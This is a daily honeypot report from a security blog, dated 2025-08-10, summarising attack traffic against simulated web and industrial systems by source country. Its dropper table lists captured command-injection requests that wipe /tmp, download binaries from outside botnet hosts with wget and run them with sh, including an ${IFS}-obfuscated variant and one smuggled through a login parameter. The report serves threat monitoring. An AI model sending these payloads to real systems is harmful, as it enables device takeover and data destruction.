Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-08-10

·316 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-10
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 12 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 5 new requests that have never been observed before (these were added to the monitored request database.).

A total of 424 requests were recorded during the day, originating from 12 different countries, with a peak of 104 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country

botnet_dropper_behaviour
#

remote_addrrequest
8.219.170.195GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
197.51.195.49GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
8.222.172.218GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
41.236.201.175GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
139.224.67.94GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
41.237.204.130GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
45.156.87.165GET /cgi-bin/rtpd.cgi?wget&-qO-&http://74.194.191.52/rondo.abs.sh
197.58.104.247GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
8.219.81.129GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
45.156.87.165GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh
45.156.87.165GET /login.cgi?cli=multilingual%20show%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zta.sh%7Csh%27%24 HTTP/1.1
197.39.97.192GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
821\x00\x0E8\xA2\x90
1651\x03\x00\x00*%\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Test
1681\x00\x0E\x08bd\xDA\xDE\xCB\x98\xAD\x18\x00\x00\x00\x00\x00
1691\x00\x0E8\xDD\xED\xF2\x94\xDEKDd\x00\x00\x00\x00\x00
1701\x00\x0E8bd\xDA\xDE\xCB\x98\xAD\x18\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0104US
159GB
253SG
347HK
420NL
518FR
614SC
712AU
812CH
911PL
1010DE
119ZA
129BG
138UA
146CN
155EG
164HU
174CA
183BE
193IR
202TR
212LT
221KR
231MZ
241ES
251JP
261RO
271TW
281MD
291MX
301VN

Related

Report: 2025-08-09
·293 words
Repport Daily
Report: 2025-08-08
·332 words
Repport Daily
Report: 2025-08-07
·515 words
Repport Daily